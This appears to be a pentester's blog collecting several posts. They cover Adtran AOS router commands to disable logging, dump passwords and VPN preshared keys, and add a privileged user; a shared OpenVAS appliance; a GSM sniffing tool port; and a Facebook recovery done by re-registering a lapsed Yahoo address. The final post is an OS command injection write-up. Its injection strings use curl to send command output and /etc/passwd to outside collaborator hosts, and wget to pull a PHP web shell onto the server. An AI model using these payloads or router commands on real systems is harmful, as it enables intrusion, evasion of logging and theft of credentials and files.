Useful AOS (Adtran OS) CLI commands and tips for pentesting

Below is some junk for AOS you might find useful in a pentest.

 CLI cmds:

Turns on privileged commands "all below commands assume enable command executed with success":

enable

Disable logging for session

no events all 

From here for easy hacking and if the system is in a DMZ, hanging off the inet or the proper ports are exposed, just enable the http server and continue from there. 

configure terminal

http server 80 

If you cant access the http server the cmds below should help get some info out of the system. 

Lists users and PWs

show running-config | include username #displays usernames and passwords.

Add new user with op privs

configure terminal 

username operator privilege 10 password unencrypted passwd1

List IPs

show ip interfaces

Download a file to target system *after running cmd below you will be promoted for more data and you will need an tftp server running that is accessible by the target"

copy tftp flash "or cflash"

Download file from target to your system 

copy flash tftp

 View vpns name and preshared keys

show crypto ike remote-id

 View vpns configs *below cmd should give all client configs, you add the name at end to view only that names config

show crypto ike congratulation pool

 View vpns policy

show crypto ike policy 

TCL script to set up a VPN in the AOS CLI  with walk through:

https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf

AOS CLI reference:

 https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf

If you have anything to add please hit me up and let me know, i would love to see this grow!

Hax11 updated!

Hax11 has been updated to work on the latest kali and its still a target rich envirometn out there folks! Get it HERE and get to hax0rin :)

VBox OpenVAS Appliance

Recently I have been trying to get OpenVAS running, on any thing other than my laptop, tried Raspberry Pi, Docker, then a bare metal install of Ubuntu. No joy at all ever. So I gave up and finally got it running on a Kali install using Virtual Box in my laptop. Did work on the OpenVAS config to get you running faster, exported then and got the VBos image running on my server to confirm. After all the pain and time lost of installing and setup I figured I would export it as an appliance and share with the net. You can get it here

Some notes:

• ssh is running on 22022 login is user:asd123 "Change that pw ASAP"
• You have to ssh in as user to start OVAS "sudo gvm-start"
• Also change root pw as it as asd123 as well
• GVM web ui is on port 5050
• admin:asd123 "change that pw ASAP"
• VBox is set to forward the ports so whatever system you install it on is the IP you need to connect to with the ports set to 22022 for ssh and 5050 for OVAS
• Might also be a good idea to ssh in and update the feeds.
• tops IP list is top 1000 TCP and top 100 UDP
• Full and fast Clone 1 is Full and fast w/o DoS and a few other checks
• Profit??

Enjoy :)

GRGSM hacked/back ported/added legacy support/or somethig for the hackrf

This is a modified version of the grgsm_livemon to make it work with hackrf, for some reason they took it out of recent distractions including RF focused linux distros like DragonOS. That was foolish, so I brought I would bring back the joy. Open in GNU Radio Companion, build, and play.

Example usage after building: python grgsm_livemon.py -a -g 30 -f [freq]M

Get it HERE

Yahoo! blunder to Facebook account recovery joy

A friend of my wife and I, came to us wanting to know how she can get into a old Facebook account that she forgot the password of. She created it back when FB was first introduced to the public and It had messages and pics from a family member that passed, so we wanted to help her if we could. 

She told us she already attempted to contact FB with no success so I suggested she send a password reset request to whatever email account she used to setup the FB account, but she claimed that account no longer exited on Y! and didn't have a phone tired to the account which made other recovery options unusable I wasn't entirely sure this was even possible. 

I know that after a while an account may become inactive, and you need to re-activate it, but complete removal seemed uncommon. However I also know that Y! has had its issues with security and I remember they started deleting really old inactive accounts to cut down on hacked accounts. So lucky our friend did remember the email address she used and we just recreated it in Y! She sent the pw reset email, and was able to get in. An interesting use case,

Thanks, 

Hacking around with os injection

During a recent pentest of an app made with php, burp gave me a little surprise of a os commend injection notification! I had fun playing around with it and it was in the oddest place. Burp had interaction with collaborator so it was a solid notification. 

The issue was found in one of the apps upload functions in a var called KeyId. Which was i think passed to the php system call (or exec,passthru,etc.) for some reason. Here is the payload burp was using to get collaborator interaction: 

14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`' 

So for RCE I needed to use a str like: 

14316'"`0&< CMD >&`' 

First I wanted verify I had access to the system so I thought I would use curl to exfil the results of running a cmd, and my first choice was id to check my privs on the system. So I used this str: 

14316'"`0&id|curl -d @- http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`' 

This confirmed I can run system cmds, exfil the data, and that I was running them as a low level user. Then I start to exfil files to look for priv esc and gather info. I also used curl for this to make POST requests to burp collab and put file data in POST data. Here is an example str: 

14316'"`0&curl -F file=@/etc/passwd http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'

 After getting a few files pulled down I figured the next move was to try to get a web shell on the system to continue to check priv esc. I would have purffered Metasploit, but due to the many network restrictions, it wasn’t an option so I figured I would try to get the system to pull down a php web shell from the web. Which worked like a charm. Here is the str I used to dl files from the web:

 14316'"`0&wget https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eee a89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php&`' 

Because the web shell is a github project I changed the name of the shell right away incase of automated scanners looking for easy wins. So that is it, have fun and stay safe out there.